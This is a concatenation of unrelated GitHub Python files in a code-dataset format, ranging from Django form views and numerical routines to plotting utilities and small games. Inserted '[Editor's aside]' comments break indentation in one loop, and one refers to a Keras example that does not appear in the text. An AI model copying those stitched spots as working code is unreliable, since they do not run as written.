Data folder\n data = Path('data')\n fp = data/'CAISO_zone_1_.csv'\n\n # Ingest data\n df = pd.read_csv(fp)\n\n # Holidays\n holidays = USFederalHolidayCalendar().holidays()\n\n # Raw data is 2018, 2019, 2020\n for year in years:\n # Split by year and add index, place as first column\n #df_temp = df[df['time'].str.contains(year)].reset_index().drop(columns='index')\n df_temp = df[df['time'].str.contains(year)]\n df_temp['date_time'] = pd.to_datetime(df_temp['time'])\n df_temp['minute'] = df_temp['date_time'].dt.minute\n df_temp = df_temp.loc[df_temp['minute'] == 0].reset_index().drop(columns='index')\n df_temp['time_idx'] = df_temp.index\n first_column = df_temp.pop('time_idx')\n df_temp.insert(0, 'time_idx', first_column)\n \n # Add date related columns\n df_temp['date_time'] = pd.to_datetime(df_temp['time'])\n df_temp['month'] = df_temp['date_time'].dt.month\n df_temp['day'] = df_temp['date_time'].dt.day\n df_temp['hour'] = df_temp['date_time'].dt.hour\n df_temp['month_day'] = df_temp['month'].astype(float) + df_temp['day'].astype(float)/31\n df_temp['day_of_week'] = df_temp['date_time'].dt.day_of_week\n 
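# [Editor's aside] The Keras text-classification example earlier imports pickle
# but never uses it; a hedged sketch of persisting the fitted preprocessors for
# later inference. Variable names follow that example; the file name is an
# assumption, not taken from the repo.
import pickle

def save_preprocessors(tokenizer, encoder, path='preprocessors.pkl'):
    # both the Tokenizer and the LabelBinarizer are plain picklable objects
    with open(path, 'wb') as f:
        pickle.dump({'tokenizer': tokenizer, 'encoder': encoder}, f)

def load_preprocessors(path='preprocessors.pkl'):
    with open(path, 'rb') as f:
        state = pickle.load(f)
    return state['tokenizer'], state['encoder']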
df_temp['holiday'] = pd.to_datetime(df_temp['date_time'].dt.date).isin(holidays).astype(int).astype(str)\n df_temp['series'] = 'A' \n df_temp = df_temp.drop(columns='time')\n\n # Add lags\n lag_list = ['DHI', 'DNI', 'Dew Point', 'Solar Zenith Angle', 'Wind Speed', 'Relative Humidity', 'Temperature']\n for i in lag_list:\n col_ = i + '_lag'\n df_temp[col_] = df_temp[i].shift(1)\n\n # Drop first column with NA\n df_temp = df_temp.iloc[1:,:]\n\n # Save\n name = 'CAISO_zone_1_' + year + '.csv'\n fp_temp = data/name\n df_temp.to_csv(fp_temp, index=False)\n\n #return df_temp\n\nyears = ['2018', '2019', '2020']\ndata_preprocess(years)\n\n\ndef config_compiler(file_name):\n configs = Path('configs')\n config_file = configs/file_name\n \n with open(config_file) as f:\n config = yaml.safe_load(f)\n\n config_dict = {}\n for key in config:\n for k, v in config[key].items():\n config_dict[k] = v\n \n param_key = list(config_dict.keys())\n\n combinations = list(itertools.product(*(config_dict[Name] for Name in param_key)))\n\n return param_key, combinations\n\n\n","repo_name":"Matt-Carney/Energy-Forecasting","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71773503274","text":"from concurrent.futures import process\nfrom tokenize import String\nfrom django.dispatch import receiver\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponseRedirect, HttpResponse\nfrom django.template.defaultfilters import title\nfrom django.urls import reverse\nfrom django.contrib import messages\n\nfrom account.models import Account\nfrom .models import *\nimport datetime\nfrom .forms import FormForm, MarkdownForm\nimport mimetypes\n# use default_storage\nfrom django.core.files.storage import default_storage\n# Create your views here.\n\n\ndef index(request):\n form = Init_form.objects.all()\n return render(request, \"form/index.html\", {'form': form})\n\n\ndef generate_filename(file):\n\n filetype = file.name.split(\".\")[-1]\n time_now = datetime.datetime.now(datetime.timezone.utc)\n new_name = time_now.strftime(\n \"%d%m%y, %H%M%S\") + \"_\" + str(len(Transmit_file.objects.all())) + \".\" + filetype\n file.name = new_name\n\n return file\n\n\ndef create_initform(request):\n if not request.user.is_authenticated:\n messages.warning(request, \"Login First to proceed\")\n return HttpResponseRedirect(reverse(\"account:index\"))\n\n if request.method == \"POST\":\n name = request.POST[\"name\"]\n desc = request.POST[\"desc\"]\n file = request.FILES['form_file']\n content = MarkdownForm(request.POST)\n user = Account.objects.get(user=request.user)\n # Check name is already taken or not\n if Init_form.objects.filter(name=name).first():\n return render(request, 'form/create_initform.html', {\n \"fail_name\": \"This name is already taken\",\n \"content\": content\n })\n if content.is_valid():\n content = content.cleaned_data['Content']\n\n count = 0\n for x in Init_form.objects.all():\n count += 1\n filetype = file.name.split(\".\")[-1]\n time_now = datetime.datetime.now(datetime.timezone.utc)\n new_name = time_now.strftime(\n \"%d%m%y, %H%M%S\") + \"_\" + str(count) + \".\" + filetype\n file.name = new_name\n\n new_form = Init_form.objects.create(\n name=name, content=content, file=file, author=user, desc=desc, date=datetime.datetime.now(datetime.timezone.utc))\n new_form.save()\n return HttpResponseRedirect(reverse(\"form:index\"))\n else:\n 
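# [Editor's aside] A hedged usage sketch for config_compiler above: zipping each
# combination back onto the parameter names yields one dict per run. 'sweep.yaml'
# and its keys are assumptions; each leaf in the YAML is a list of candidate values.
param_key, combinations = config_compiler('sweep.yaml')
runs = [dict(zip(param_key, combo)) for combo in combinations]
# e.g. [{'learning_rate': 0.001, 'hidden_size': 64}, {'learning_rate': 0.001, 'hidden_size': 128}, ...]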
content = MarkdownForm()\n return render(request, 'form/create_initform.html', {'content': content})\n\n\ndef download_file(request, file_id):\n form_field = Init_form.objects.get(id=file_id)\n # Set the return value of the HttpResponse\n response = HttpResponse(form_field.file)\n # Set the HTTP header for sending to browser\n response['Content-Disposition'] = \"attachment; filename=%s\" % form_field.filename()\n # Return the response value\n return response\n\n\ndef form(request, id):\n form = Init_form.objects.get(id=id)\n return render(request, \"form/form.html\", {'form': form})\n\n\ndef delete_form(request, form_id):\n if not request.user.is_authenticated:\n messages.warning(request, \"Login First to proceed\")\n return HttpResponseRedirect(request.META.get('HTTP_REFERER', '/'))\n\n this_form = Init_form.objects.get(id=form_id)\n\n if request.user != this_form.author.user:\n return HttpResponseRedirect(reverse(\"form:form\", args=(form_id,)))\n\n this_form.delete()\n return HttpResponseRedirect(reverse(\"form:index\"))\n\n\ndef update_form(request, form_id):\n this_form = Init_form.objects.get(id=form_id)\n check_update = 1\n # Check user is own this form\n if request.user != this_form.author.user:\n return HttpResponseRedirect(reverse(\"form:form\", args=(this_form.id,)))\n\n # If user submit update form\n if request.method == \"POST\":\n form = FormForm(request.POST)\n\n if form.is_valid():\n name = form.cleaned_data['name']\n content = form.cleaned_data['content']\n desc = request.POST[\"desc\"]\n # Update This form\n this_form.name = name\n this_form.content = content\n this_form.desc = desc\n this_form.save()\n\n return HttpResponseRedirect(reverse(\"form:form\", args=(this_form.id,)))\n else:\n content = FormForm(request.POST or None, instance=this_form)\n\n return render(request, \"form/form.html\", {\n \"form\": this_form,\n \"check_update\": check_update,\n \"form_update\": content,\n })\n\n\ndef internship(request):\n\n if not request.user.is_authenticated:\n messages.warning(request, \"Login First to proceed\")\n return HttpResponseRedirect(reverse(\"account:index\"))\n\n receiver = \"admin\"\n\n account = Account.objects.get(user=request.user)\n step = account.current_state\n\n if step == 0:\n init_internship_form = Init_form.objects.get(name=\"init\")\n\n # student upload file then do\n if request.method == \"POST\":\n # need to create post to upload feedback\n file = request.FILES['form_file']\n desc = request.POST['desc']\n processed_file = generate_filename(file)\n new_form = Transmit_file.objects.create(\n file=processed_file, desc=desc, sender=account.user.username, receiver=receiver, date=datetime.datetime.now(datetime.timezone.utc))\n new_form.save()\n\n account.current_state += 1\n account.sent_box.add(new_form)\n account.save()\n\n # notify staff to sent file\n for staff in Account.objects.filter(type=\"Staff\"):\n staff.receive_box.add(new_form)\n staff.save()\n\n # recursive to proceed next step\n return HttpResponseRedirect(reverse(\"form:internship\"))\n\n return render(request, \"form/internship.html\", {\n \"step\": step,\n \"init_form\": init_internship_form\n })\n\n elif step == 1:\n\n # get form uploaded from staff\n received_file = account.receive_box\n\n # student upload file then do\n if request.method == \"POST\":\n\n # need to create post to upload feedback\n file = request.FILES['form_file']\n desc = request.POST['desc']\n processed_file = generate_filename(file)\n new_form = Transmit_file.objects.create(\n file=processed_file, desc=desc, 
sender=account.user.username, receiver=receiver, date=datetime.datetime.now(datetime.timezone.utc))\n new_form.save()\n\n account.current_state += 1\n account.sent_box.add(new_form)\n account.save()\n\n # notify staff to sent file\n for staff in Account.objects.filter(type=\"Staff\"):\n staff.receive_box.add(new_form)\n staff.save()\n\n # recursive to proceed next step\n return HttpResponseRedirect(reverse(\"form:internship\"))\n\n return render(request, \"form/internship.html\", {\n \"step\": step,\n \"forms\": received_file.all()\n })\n\n # uploaded all response wait for final form\n elif step == 2:\n\n # get form uploaded from staff\n received_file = account.receive_box\n\n # need reset button to reset step to 0\n\n return render(request, \"form/internship.html\", {\n \"step\": step,\n \"forms\": received_file.all()\n })\n\n return render(request, \"form/internship.html\", {\n \"step\": step\n })\n\n\ndef restart_internship(request):\n\n if not request.user.is_authenticated:\n messages.warning(request, \"Login First to proceed\")\n return HttpResponseRedirect(reverse(\"account:index\"))\n\n account = Account.objects.get(user=request.user)\n\n account.current_state = 0\n\n for o in account.sent_box.all():\n o.delete()\n account.sent_box.clear()\n\n account.read_box.clear()\n\n for o in account.receive_box.all():\n o.delete()\n account.receive_box.clear()\n account.save()\n\n return HttpResponseRedirect(reverse(\"form:internship\"))\n\n\ndef response_form(request, trans_id):\n\n if not request.user.is_authenticated:\n messages.warning(request, \"Login First to proceed\")\n return HttpResponseRedirect(reverse(\"account:index\"))\n\n account = Account.objects.get(user=request.user)\n\n transmit_file = Transmit_file.objects.get(id=trans_id)\n\n receiver_acc = Account.objects.get(\n user=User.objects.get(username=transmit_file.sender))\n\n if request.method == \"POST\":\n # need to create post to upload feedback\n file = request.FILES['form_file']\n desc = request.POST['desc']\n processed_file = generate_filename(file)\n new_form = Transmit_file.objects.create(\n file=processed_file, desc=desc, sender=account.user.username, receiver=receiver_acc.user.username, date=datetime.datetime.now(datetime.timezone.utc))\n new_form.save()\n\n account.sent_box.add(new_form)\n account.save()\n\n receiver_acc.receive_box.add(new_form)\n receiver_acc.save()\n\n return HttpResponseRedirect(reverse(\"account:index\"))\n\n return render(request, \"form/response.html\", {\n \"this_file\": transmit_file,\n \"done\": 0\n })\n","repo_name":"InternshipEngr/InternshipEngr","sub_path":"form/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33403426700","text":"## module bisection\r\n''' root = bisection(f,x1,x2,switch=0,tol=1.0e-9).\r\n Finds a root of f(x) = 0 by bisection.\r\n The root must be bracketed in (x1,x2).\r\n Setting switch = 1 returns root = None if\r\n f(x) increases upon bisection.\r\n''' \r\nimport math\r\nimport error\r\nfrom numpy import sign\r\n\r\ndef bisection(f,x1,x2,switch=1,tol=1.0e-9):\r\n f1 = f(x1)\r\n if f1 == 0.0: return x1\r\n f2 = f(x2)\r\n if f2 == 0.0: return x2\r\n if sign(f1) == sign(f2):\r\n error.err('Root is not bracketed')\r\n n = int(math.ceil(math.log(abs(x2 - x1)/tol)/math.log(2.0)))\r\n \r\n for i in range(n):\r\n x3 = 0.5*(x1 + x2); f3 = f(x3)\r\n if (switch == 1) and (abs(f3) > abs(f1)) \\\r\n and (abs(f3) > abs(f2)):\r\n return None \r\n 
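# [Editor's aside] generate_filename in the Django views above derives names from
# a timestamp plus a table count, which can collide under concurrent uploads. A
# hedged alternative sketch (not the project's actual helper) using uuid4:
import uuid

def generate_unique_filename(file):
    extension = file.name.rsplit('.', 1)[-1]
    file.name = f"{uuid.uuid4().hex}.{extension}"  # collision-safe regardless of timing
    return file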
if f3 == 0.0: return x3\r\n        if sign(f2)!= sign(f3): x1 = x3; f1 = f3\r\n        else: x2 = x3; f2 = f3\r\n    return (x1 + x2)/2.0\r\n","repo_name":"nickcafferry/Original-Codes-from-Numerical-Methods-in-Engineering-with-Python-3","sub_path":"Book_Python_Code/Python Code/bisection.py","file_name":"bisection.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"}
+{"seq_id":"11036143859","text":"# first, find the middle\n# then reverse the second half\n# compare the second half against the first\n# finally reverse again to restore the list\nclass Node:\n    def __init__(self, value, next=None):\n        self.value = value\n        self.next = next\ndef is_palindromic_linked_list(head):\n    fast =head\n    slow = head\n    #find the middle\n    while fast!=None and fast.next!=None:\n        fast = fast.next.next\n        slow = slow.next\n    #odd or even the slow.next will be the head\n    second = reverse(slow)\n    slow.next = second\n    third =head\n    while second != None and third !=None:\n        if second.value == third.value:\n            third =third.next\n            second =second.next\n        else:\n            break \n    firth = reverse(slow)  # restore the original list order\n    slow.next = firth\n    # the reversed second half is the shorter one: if it was fully consumed,\n    # every node matched and the list is a palindrome (the original condition\n    # was inverted and reported the opposite result)\n    if second is None:\n        return True\n    else:\n        return False\ndef reverse(start):\n    head = start.next\n    pre = None\n    cur = head\n    last = head.next\n    while last!=None:\n        tmp = last.next\n        last.next = head\n        head.next =pre\n        pre =head\n        head = last\n        last =tmp\n    head.next =pre\n    return head\n    \ndef main():\n    head = Node(2)\n    head.next = Node(4)\n    head.next.next = Node(6)\n    head.next.next.next = Node(4)\n    head.next.next.next.next = Node(2)\n\n    print(\"Is palindrome: \" + str(is_palindromic_linked_list(head)))\n\n    head.next.next.next.next.next = Node(2)\n    print(\"Is palindrome: \" + str(is_palindromic_linked_list(head)))\n\n\nmain() \n","repo_name":"HumphreyHao/Pattern-for-python","sub_path":"fast and slow pointer/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":1453,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"33867276662","text":"import logging\nimport pyautogui\nimport time\nimport pandas as pd\nfrom ..navigation.essentials import scroll, move_mouse\nfrom ..navigation.navigator import navigate\nfrom ..triggers.swap import process_swap\nfrom ..tools.action_processor import check_action_kind\nfrom .blacklist_processor import check_for_blacklisted_page\nfrom ..tools.image_similarity import check_similarity\n\n\ndef page_depth_exceeds_limit(self, page_name):\n    if len(page_name.split('-')) > self.max_depth:\n        logging.info(f'Due to page {page_name} being deeper than max depth, it will be skipped!~yellow')\n        return True\n    return False\n\n\ndef adjust_scroll_position(self, image_id):\n    if image_id > self.scrolls:\n        scroll(self, image_id - self.scrolls)\n        self.scrolls = int(image_id)\n    elif image_id < self.scrolls:\n        move_mouse(self, self.width // 2, self.height // 2)\n        self.scrolls = 1\n        pyautogui.scroll(1)\n        time.sleep(self.loading_time)\n\n\ndef navigate_and_handle_errors(self, page_name, data):\n    if navigate(self, path=page_name) == 'Error':\n        if check_for_blacklisted_page(self, data):\n            self.app_details = pd.concat([self.app_details, data], ignore_index=True)\n        return True\n    return False\n\n\ndef check_if_scanning_finished(self):\n    for i in range(10):\n        time.sleep(self.loading_time)\n        if self.status == 'Alive':\n            break\n        if i == 9:\n            if len(self.data_queue) == 0 and self.status == 'Dead':\n                self.run = False\n                return True\n            else:\n                break\n    return False\n\n\ndef interact_and_verify_action(self, x1, y1, x2, y2):\n    
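# [Editor's aside] A hedged usage example for the bisection routine above; the
# cubic is illustrative. f(0) = 5 > 0 and f(1) = -4 < 0, so a root is bracketed.
if __name__ == '__main__':
    f = lambda x: x**3 - 10.0*x**2 + 5.0
    root = bisection(f, 0.0, 1.0, tol=1.0e-9)
    print('root =', root)  # approximately 0.7346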
self.screenshotMaker.make_screenshot()\n current_image = self.screenshotMaker.image\n move_mouse(self, x1, y1, x2, y2, click=True, sleep=True, sleep_time=self.loading_time / 2)\n status = check_action_kind(self, current_image)\n if status == 'No action':\n move_mouse(self, x1, y1, x2, y2, click=True, sleep=True, sleep_time=self.loading_time / 2)\n status = check_action_kind(self, current_image)\n if status != 'No action':\n time.sleep(self.loading_time / 2)\n status = check_action_kind(self, current_image)\n else:\n time.sleep(self.loading_time / 2)\n status = check_action_kind(self, current_image)\n return status\n\n\ndef check_for_already_existing_page(self, images, element_parent_name):\n self.screenshotMaker.make_screenshot()\n for child, image in zip(images.keys(), images.values()):\n if check_similarity(self, image, self.screenshotMaker.image, confidence_coefficient=0.03):\n logging.info(f'Element {element_parent_name} triggered same action as {child}~pink')\n return False\n return True\n\n\ndef check_for_wrong_action_report(self, parent, status, element_parent_name):\n if '-'.join(self.current_position) != parent and status == 'New page':\n logging.info(f'Previous report about action trigger was wrong!~red')\n logging.info(f'Element {element_parent_name} triggered following action: Changed current page~pink')\n self.blacklisted_pages.append(element_parent_name)\n navigate(self, parent)\n elif '-'.join(self.current_position) != parent:\n logging.info(f'Current position: {parent} changed to '\n f'{\"-\".join(self.current_position)}~yellow')\n navigate(self, parent)\n scroll(self, self.scrolls - 1)\n","repo_name":"TrueBalkar/TrusteePlusAnalyzer","sub_path":"scanner/tools/essentials.py","file_name":"essentials.py","file_ext":"py","file_size_in_byte":3443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11149024234","text":"import turtle\r\nimport random\r\n\r\ncolors = ['red', 'orange', 'yellow', 'green', 'light green', 'blue', 'purple', 'white', 'gold']\r\nscore = 0\r\n\r\n\r\ndef create_turtle(x, y, color='red', size=2, pen_color='blue', pen_size=2, heading=90, hide=False):\r\n manysturtle = turtle.Turtle()\r\n if hide:\r\n manysturtle.hideturtle()\r\n\r\n manysturtle.shape('turtle')\r\n manysturtle.color(color)\r\n manysturtle.shapesize(size)\r\n manysturtle.setheading(heading)\r\n manysturtle.pensize(pen_size)\r\n manysturtle.pencolor(pen_color)\r\n manysturtle.penup()\r\n manysturtle.goto(x, y)\r\n manysturtle.speed('fastest')\r\n\r\n return manysturtle\r\n\r\n\r\ndef draw_star(pensize, pencolor, size, color):\r\n star_turtle.pensize(pensize)\r\n star_turtle.pencolor(pencolor)\r\n\r\n star_turtle.fillcolor(color)\r\n star_turtle.begin_fill()\r\n\r\n for _ in range(5):\r\n star_turtle.forward(size)\r\n star_turtle.right(144)\r\n star_turtle.forward(size)\r\n star_turtle.left(72)\r\n\r\n star_turtle.end_fill()\r\n\r\n\r\ndef draw_random_star_in_position(x, y):\r\n pensize = random.randint(1, 8)\r\n pencolor = random.choice(colors)\r\n angle = random.randint(0, 180)\r\n star_size = random.randint(5, 60)\r\n star_color = random.choice(colors)\r\n\r\n star_turtle.penup()\r\n star_turtle.goto(x, y)\r\n star_turtle.pendown()\r\n\r\n star_turtle.setheading(angle)\r\n draw_star(pensize, pencolor, star_size, star_color)\r\n\r\n global score\r\n score += star_size + pensize\r\n draw_score(score)\r\n\r\n\r\ndef draw_score(score):\r\n score_turtle.clear()\r\n score_turtle.write('Score: ' + str(score), font=('Algerrian', 20, 
'normal'))\r\n\r\n\r\nturtle.hideturtle()\r\nturtle.bgcolor('black')\r\n\r\nstar_turtle = create_turtle(0, 0, hide=True)\r\n\r\nx_max, y_max = turtle.window_width()//2, turtle.window_height()//2\r\nscore_turtle = create_turtle(-x_max + 10, y_max - 30, pen_color='white', hide=True)\r\n\r\nturtle.getscreen().onclick(draw_random_star_in_position)\r\nturtle.done()\r\n","repo_name":"jonathanqbo/moncton-python-2020","sub_path":"week7/homework/JunHuang_Task3_AddScoreIntoYourMouseclickDrawGame.py","file_name":"JunHuang_Task3_AddScoreIntoYourMouseclickDrawGame.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10490560749","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LinearSegmentedColormap\n\n\nCOLOR_MAP = {\n 'attribute': '#488A99',\n 'class': '#DBAE58',\n 'exception': '#AC3E31',\n 'function': '#484848',\n 'method': '#DADADA',\n 'repos': '#488A99',\n 'files': '#484848',\n 'corr_low': '#DADADA',\n 'corr_high': '#484848'\n}\n\n\ndef transform_df(df, imports_only=False):\n df = df.copy()\n df['repo'] = df['filename'].str.split('/').str[5]\n df['filename'] = df.apply(lambda row: row['filename'].split(row['repo'])[-1], axis=1).str[1:]\n if imports_only:\n df = df[['repo', 'filename', 'module']]\n else:\n df = df[['repo', 'filename', 'module', 'component_type', 'component_name', 'count']]\n df['library'] = df['module'].str.split('.').str[0]\n return df\n\n\ndef libraries_in_repos(df):\n df = df.drop(['module'], axis=1).drop_duplicates()\n return df.groupby('library')['repo'].nunique().reset_index().rename(columns={'repo': 'count'})\n\n\ndef libraries_in_files(df):\n df = df.drop(['module'], axis=1).drop_duplicates()\n return df.groupby('library')['filename'].nunique().reset_index().rename(columns={'filename': 'count'})\n\n\ndef modules_in_repos(df):\n return df.groupby('module')['repo'].nunique().reset_index().rename(columns={'repo': 'count'})\n\n\ndef modules_in_files(df):\n return df.groupby('module')['filename'].nunique().reset_index().rename(columns={'filename': 'count'})\n\n\ndef module_component_counts(df):\n return df.groupby(['module', 'component_type'])['count'].sum().reset_index()\n\n\ndef component_in_files(df, module):\n return df[df['module'] == module].groupby(['component_type', 'component_name'])['filename'].nunique().reset_index().rename(columns={'filename': 'count'})\n\n\ndef component_counts(df, module):\n return df[df['module'] == module].groupby(['component_type', 'component_name'])['count'].sum().reset_index()\n\n\ndef specific_component_type_in_files(df, module, component_type):\n return df[(df['module'] == module) & (df['component_type'] == component_type)].groupby('component_name')['filename'].nunique().reset_index().rename(columns={'filename': 'count'})\n\n\ndef specific_component_type_counts(df, module, component_type):\n return df[(df['module'] == module) & (df['component_type'] == component_type)].groupby('component_name')['count'].sum().reset_index()\n\n\ndef plot_popularity(df, title, top_n=None, full_count=None, files_or_repos='repos'):\n fig, ax = plt.subplots(figsize=(16, 8))\n\n if len(df.columns) == 2:\n df = df.sort_values(by='count', ascending=False).head(top_n).set_index(df.columns[0]).sort_values(by='count')\n df.plot(kind='barh', edgecolor='white', ax=ax, width=0.8, color=COLOR_MAP[files_or_repos])\n ax.get_legend().remove()\n\n elif len(df.columns) == 3:\n 
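# [Editor's aside] A hedged usage sketch for the helpers above. 'imports.csv' and
# its columns are assumptions; note transform_df expects the repo name at path
# segment index 5, so differently shaped paths would need the split adjusted.
raw = pd.read_csv('imports.csv')
df = transform_df(raw, imports_only=True)
plot_popularity(libraries_in_repos(df), 'Libraries by number of repos', top_n=20)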
grouping_column = (set(df.columns) & {'module', 'library', 'component_name'}).pop()  # parenthesize before .pop(): the original popped from the literal set first, making the intersection a set-and-string TypeError\n        top_n_names = df.groupby(grouping_column)['count'].sum().sort_values(ascending=False).head(top_n).index\n        df = df[df[grouping_column].isin(top_n_names)]\n        df = df.pivot(index=grouping_column, columns='component_type', values='count')\n        df = df.loc[df.sum(axis=1).sort_values(ascending=True).index]\n        df.plot(kind='barh', stacked=True, edgecolor='white', ax=ax, width=0.8, color=[COLOR_MAP[col] for col in df.columns])\n        ax.legend(title='Component Type', loc='lower right')\n\n    ax.set_xlim([-max(df.sum(axis=1)) * 0.08, max(df.sum(axis=1)) * 1.1])\n\n    for i, total in enumerate(df.sum(axis=1)):\n        if full_count:\n            percentage = total / full_count * 100\n            ax.text(-0.05, i, '{:1.2f}%'.format(percentage), va=\"center\", fontsize=12, ha=\"right\")\n        else:\n            ax.text(-0.05, i, '{:1.0f}'.format(total), va=\"center\", fontsize=12, ha=\"right\")\n\n    ax.set_xlabel('')\n    ax.set_ylabel('')\n    ax.set_title(title, fontsize=16)\n    ax.set_xticks([])\n    ax.tick_params(axis='y', length=0, labelsize=12)\n    \n    for spine in ax.spines.values():\n        spine.set_visible(False)\n    \n    plt.show()\n\n\ndef get_corr_table(df, index='filename', column='component_name', binary=True, top_n=24):\n    if index in ('filename', 'repo') and column in ('component_name', 'module', 'library'):\n        if 'count' not in df.columns:\n            df['count'] = 1\n        df = df[[index, column, 'count']]\n        if index == 'filename':\n            top = df.groupby(column)['filename'].nunique().sort_values(ascending=False).head(top_n).index\n        else:\n            top = df.groupby(column)['count'].sum().sort_values(ascending=False).head(top_n).index\n\n        pivot_df = df[df[column].isin(top)].pivot_table(index=index, columns=column, values='count', fill_value=0)\n\n        if binary:\n            binary_df = pivot_df.copy()\n            binary_df[binary_df > 0] = 1\n            return binary_df.corr()\n        else:\n            return pivot_df.corr()\n    \n\ndef plot_correlation_matrix(df, title):\n    mask = np.triu(np.ones_like(df, dtype=bool))\n    cmap = LinearSegmentedColormap.from_list(\"custom\", [COLOR_MAP['corr_low'], COLOR_MAP['corr_high']], N=256)\n\n    plt.figure(figsize=(16, 16))\n    ax = sns.heatmap(df, cmap=cmap, center=0, annot=True, annot_kws={'size': 12}, fmt='.2f', mask=mask, cbar=False)\n    ax.set_xticklabels(ax.get_xmajorticklabels(), fontsize = 12)\n    ax.set_yticklabels(ax.get_ymajorticklabels(), fontsize = 12)\n    ax.tick_params(bottom=False, left=False)\n    ax.set(xlabel='', ylabel='')\n    plt.title(title, fontsize=16)\n    plt.show()\n\n\ndef prepare_series_for_corr(s):\n    df = s.reset_index()\n    df.columns = ['Library', 'Correlation']\n    df = round(df.iloc[1:], 2)\n    return df\n\n\ndef plot_correlations(s1, s2, s3, title):\n    df1 = prepare_series_for_corr(s1)\n    df2 = prepare_series_for_corr(s2)\n    df3 = prepare_series_for_corr(s3)\n    \n    fig, axs = plt.subplots(1, 3, figsize=(14, 4.5))\n    for ax in axs:\n        ax.axis('off')\n\n    dfs = [df1, df2, df3]\n\n    for i, ax in enumerate(axs):\n        tbl = ax.table(cellText=dfs[i].values,\n                       colLabels=dfs[i].columns,\n                       cellLoc='center',\n                       loc='center')\n\n        tbl.auto_set_font_size(False)\n        tbl.set_fontsize(14)\n        tbl.scale(1.2, 1.2)\n\n        cells = [key for key in tbl.get_celld().keys()]\n        for cell in cells:\n            tbl.get_celld()[cell].set_edgecolor(\"grey\")\n            tbl.get_celld()[cell].set_linewidth(0.5)\n\n        library_title = s1.index[0] if i == 0 else (s2.index[0] if i == 1 else s3.index[0])\n        ax.set_title(f'{library_title}', fontsize=16)\n\n    fig.suptitle(title, fontsize=16)\n\n    plt.tight_layout(rect=[0, 0, 1, 0.99])\n    
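# [Editor's aside] A hedged sketch chaining the correlation helpers above; the
# title is illustrative and df is assumed to come from transform_df as before.
corr = get_corr_table(df, index='repo', column='library', binary=True, top_n=24)
plot_correlation_matrix(corr, 'Library co-occurrence across repositories')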
plt.show()\n","repo_name":"tobias-talaj/top-python-repos-analysis","sub_path":"notebooks/analysis_utils.py","file_name":"analysis_utils.py","file_ext":"py","file_size_in_byte":6750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"36400062491","text":"# Build an automatic pizza order program\n# use the camelCase naming style\n\n# prepare the basic requirements to take orders.\nprint(\"Welcome to Python Pizza Deliveries!\\nWhat will your order be?\")\n\n# take the order\nsize = input(\"What size do you want? S, M, or L\\n\")\naddPepperoni = input(\"Do you want pepperoni? Y/N\\n\")\nextraCheese = input(\"Do you want extra cheese? Y/N\\n\")\n\n# add the conditions here\nbill = 0\nif size == \"S\":\n    bill = 15\nelif size == \"M\":\n    bill = 20\nelif size == \"L\":\n    bill = 25\n\n# pepperoni is an extra charge only when requested: $2 on small, $3 otherwise\n# (the original charged $3 whenever the answer was not \"Y\")\nif addPepperoni == \"Y\":\n    if size == \"S\":\n        bill += 2\n    else:\n        bill += 3\n\nif extraCheese == \"Y\":\n    bill += 1\n\nprint(f\"Your bill is: ${bill}\")\n","repo_name":"Glaciux/100-days-of-Python","sub_path":"Day_3/Day_3_5.py","file_name":"Day_3_5.py","file_ext":"py","file_size_in_byte":629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"25162248551","text":"import csv\nimport os\n\n\n\nwith open('./images/annotations.csv', mode='r') as csv_file:\n    fieldnames = ['path', 'x1', 'y1', 'x2', 'y2', 'class']\n    csv_reader = csv.DictReader(csv_file, fieldnames=fieldnames)\n    line_count = 0\n    img_count = 0\n    file_old = \"\"\n    for row in csv_reader:\n        line_count = line_count + 1\n        file = row[\"path\"].replace('/content/keras-retinanet/', '')\n        # file = \".\"+row[\"path\"]\n        if file_old != file:\n            file_old = file\n            img_count = img_count + 1\n        if not os.path.isfile(file):\n            print(\"File does not exist\", file)\n\n    print(\"Number of boxes\", line_count )\n    print(\"Number of images\", img_count)\n\n\n\n\n\n","repo_name":"MrFlexi/keras-retinanet","sub_path":"check_annotations.py","file_name":"check_annotations.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"15825473562","text":"\"\"\"\nThis module contains base classes for git connection.\nAll concrete connectors are inherited from them.\n\"\"\"\n\nfrom typing import Optional, List, Dict\nfrom dataclasses import dataclass, asdict\nfrom abc import ABC, abstractmethod\n\n\n@dataclass\nclass GitPullRequest:\n    \"\"\"\n    This class represents a PR\n    \"\"\"\n\n    author: str\n    state: str\n    title: str\n    url: str\n\n\nclass AbstractGitRepo(ABC):\n    \"\"\"\n    This class represents an abstract git repository.\n    All concrete repository classes should be inherited from this.\n    \"\"\"\n\n    def __init__(\n        self,\n        owner: str,\n        source: str,\n        external_id: str,\n        name: str,\n        private: bool\n    ):\n        self.owner = owner\n        self.source = source\n        self.external_id = external_id\n        self.name = name\n        self.private = private\n\n    @abstractmethod\n    def get_pull_requests(self) -> List[GitPullRequest]:\n        \"\"\"\n        Fetch all PRs for this repository.\n        \"\"\"\n\n        raise NotImplementedError()\n\n    def as_dict(self) -> Dict:\n        \"\"\"\n        Return normalized representation of repository, with all PRs attached.\n        \"\"\"\n\n        pull_requests = self.get_pull_requests()\n\n        return {\n            \"owner\": self.owner,\n            \"source\": self.source,\n            \"external_id\": self.external_id,\n            \"name\": 